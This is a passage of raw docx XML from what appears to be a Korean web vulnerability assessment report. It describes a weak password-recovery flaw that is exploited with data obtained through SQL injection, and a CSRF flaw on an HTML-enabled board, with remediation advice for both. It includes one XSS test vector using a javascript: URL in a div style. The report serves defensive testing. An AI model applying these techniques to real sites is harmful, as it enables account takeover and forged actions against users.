          <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="008E1230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div STYLE="background-image: url(javascript:document.vulnerable=true;)"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="00DD5F2F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</w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230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8E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="002A51A4" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="445" w:name="_Toc48909041"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>취약한 패스워드 복구</w:t>
      </w:r>
      <w:bookmarkEnd w:id="445"/>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230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8E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230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8E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230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8E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230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46" w:name="_Toc48909042"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="446"/>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00922158" w:rsidRDefault="008C7EC1" w:rsidP="008C7EC1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="002A51A4" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>패스워드 복구 로직을 유추하기 어렵게 구현하고</w:t>
      </w:r>
      <w:r w:rsidR="00DC3C1F" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A51A4" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">인증된 사용자 메일이나 </w:t>
      </w:r>
      <w:r w:rsidR="002A51A4" w:rsidRPr="00922158">
        <w:t>SMS</w:t>
      </w:r>
      <w:r w:rsidR="002A51A4" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에서만 복구 패스워드를 확인할 수 있도록 하지 않아, 공격자가 불법적으로 다른 사용자의 패스워드를 획득, 변경, 복구할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230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47" w:name="_Toc48909043"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="447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8E1230" w:rsidRPr="00C97C1E" w:rsidTr="008E1230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8E1230" w:rsidRPr="00922158" w:rsidRDefault="008E1230" w:rsidP="002A51A4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8E1230" w:rsidRPr="00922158" w:rsidRDefault="008E1230" w:rsidP="002A51A4">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00922158">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidR="002A51A4" w:rsidRPr="00922158">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="002A51A4" w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>m_member_loss.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidTr="008E1230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8E1230" w:rsidRPr="00922158" w:rsidRDefault="008E1230" w:rsidP="008E123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8E1230" w:rsidRPr="00922158" w:rsidRDefault="008E1230" w:rsidP="002A51A4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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="002A51A4" w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>이름과 이메일 정보만 있으면,</w:t>
            </w:r>
            <w:r w:rsidR="002A51A4" w:rsidRPr="00922158">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002A51A4" w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>바로 임시 패스워드 생성 가능</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="008E1230">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="008E123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>SQL 인젝션</w:t>
      </w:r>
      <w:r w:rsidR="002A51A4" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격으로 확보한 사용자 정보를 활용해 패스워드 복구 시도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="008E123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7C3B4C2A" wp14:editId="09E5EA9C">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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9" t="7066" r="8011" b="48191"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860295" cy="306040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230" w:rsidRPr="00922158" w:rsidRDefault="008E1230" w:rsidP="008E1230">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="448" w:name="_Toc48909161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9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2A51A4" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">아이디 찾기 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>시도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="448"/>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE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E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="008E1230">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="00E638FE">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="200" w:firstLineChars="325" w:firstLine="6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</w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>2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="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>이름과 이메일로 바로 아이디를 확인 가능하며,</w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">확인한 정보로 패스워드 찾기 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00E638FE">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="200" w:firstLineChars="325" w:firstLine="650"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>시도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="008E123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5466262E" wp14:editId="6DD3A5CC">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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3" t="7695" r="7377" b="47562"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860295" cy="306040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230" w:rsidRPr="00922158" w:rsidRDefault="008E1230" w:rsidP="008E1230">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="449" w:name="_Toc48909162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0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2A51A4" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>패스워드 찾기 시도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="449"/>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="008E1230">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="008E123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</w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>3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="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">이메일 또는 </w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SMS </w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>인증 없이 임시 패스워드로 복구해 줌</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="008E123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6B8C834F" wp14:editId="089665D0">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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3" t="3532" r="7377" b="51725"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860295" cy="306040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230" w:rsidRPr="00922158" w:rsidRDefault="008E1230" w:rsidP="008E1230">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="450" w:name="_Toc48909163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1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E638FE" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>아이디 및 패스워드</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="450"/>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="008E1230">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="008E1230">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="008E1230">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidRDefault="008E1230" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="451" w:name="_Toc48909044"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="451"/>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00922158" w:rsidRDefault="008E1230" w:rsidP="00E638FE">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00922158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난수를 이용한 불규칙적</w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00922158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(대소문자,</w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00922158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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00922158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특수문자 사용 권고)</w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00922158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이고 최소길이(6자 이상 권고) 이상의 패턴이 없는 패스워드를 발급</w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00922158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하도록 패스워드 복구 로직을 변경함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00922158" w:rsidRDefault="00E638FE" w:rsidP="00E638FE">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00922158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 xml:space="preserve">- 인증된 사용자 메일이나 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SM</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>S에서만 재설정된 패스워드를 확인 가능하도록 조치함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00E638FE">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="555555"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="452" w:name="_Toc48909045"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>크로스사이트 리퀘스트 변조(C</w:t>
      </w:r>
      <w:r w:rsidR="008C7EC1" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>RF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="452"/>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="453" w:name="_Toc48909046"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="453"/>
    </w:p>
    <w:p w:rsidR="008C7EC1" w:rsidRPr="00922158" w:rsidRDefault="008C7EC1" w:rsidP="008C7EC1">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 사이트</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 간 요청 위조(Cross-site request forgery, CSRF, XSRF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 사용자가 자신의 의지와는 무관하게 공격자가 의도한 행위(수정, 삭제, 등록 등)를 특정 웹</w:t>
      </w:r>
      <w:r w:rsidR="00F82A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve">에 요청하게 하는 공격을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>말함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C7EC1" w:rsidRPr="00922158" w:rsidRDefault="008C7EC1" w:rsidP="008C7EC1">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자의 신뢰(인증) 정보 내에서 사용자의 요청을 변조함으로써 해당 사용자의 권한으로 서버에 악의적인 공격을 수행 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="454" w:name="_Toc48909047"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="454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E638FE" w:rsidRPr="00C97C1E" w:rsidTr="00F0740E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E638FE" w:rsidRPr="00922158" w:rsidRDefault="00E638FE" w:rsidP="00F0740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E638FE" w:rsidRPr="00922158" w:rsidRDefault="00E638FE" w:rsidP="00F0740E">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00922158">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidR="00681843" w:rsidRPr="00922158">
              <w:t>/m_write.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidTr="00F0740E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E638FE" w:rsidRPr="00922158" w:rsidRDefault="00E638FE" w:rsidP="00F0740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E638FE" w:rsidRPr="00922158" w:rsidRDefault="00681843" w:rsidP="00F0740E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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidRPr="00922158">
              <w:t>HTML</w:t>
            </w:r>
            <w:r w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>사용을 할 수 있는 게시판이 존재하여,</w:t>
            </w:r>
            <w:r w:rsidRPr="00922158">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CSRF공격을 할 수 있음</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00681843" w:rsidRPr="00C97C1E" w:rsidRDefault="00681843" w:rsidP="00E638FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00681843" w:rsidRPr="00C97C1E" w:rsidRDefault="00681843" w:rsidP="00681843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E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00E638F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681843" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>서버 게시판에 글을 작성하는 CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00681843" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00681843" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>공격 스크립트 작성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00E638F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5AEF280D" wp14:editId="23E060A1">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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t="19496" r="44347" b="30760"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860411" cy="306047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8FE" w:rsidRPr="00922158" w:rsidRDefault="00E638FE" w:rsidP="00E638FE">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="455" w:name="_Toc48909164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2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681843" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>CSRF 공격 스크립트 작성</w:t>
      </w:r>
      <w:bookmarkEnd w:id="455"/>
    </w:p>
    <w:p w:rsidR="00681843" w:rsidRPr="00C97C1E" w:rsidRDefault="00681843" w:rsidP="00681843">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00681843" w:rsidRPr="00C97C1E" w:rsidRDefault="00681843" w:rsidP="0068184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3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F0740E" w:rsidRPr="00C97C1E">
        <w:rPr>
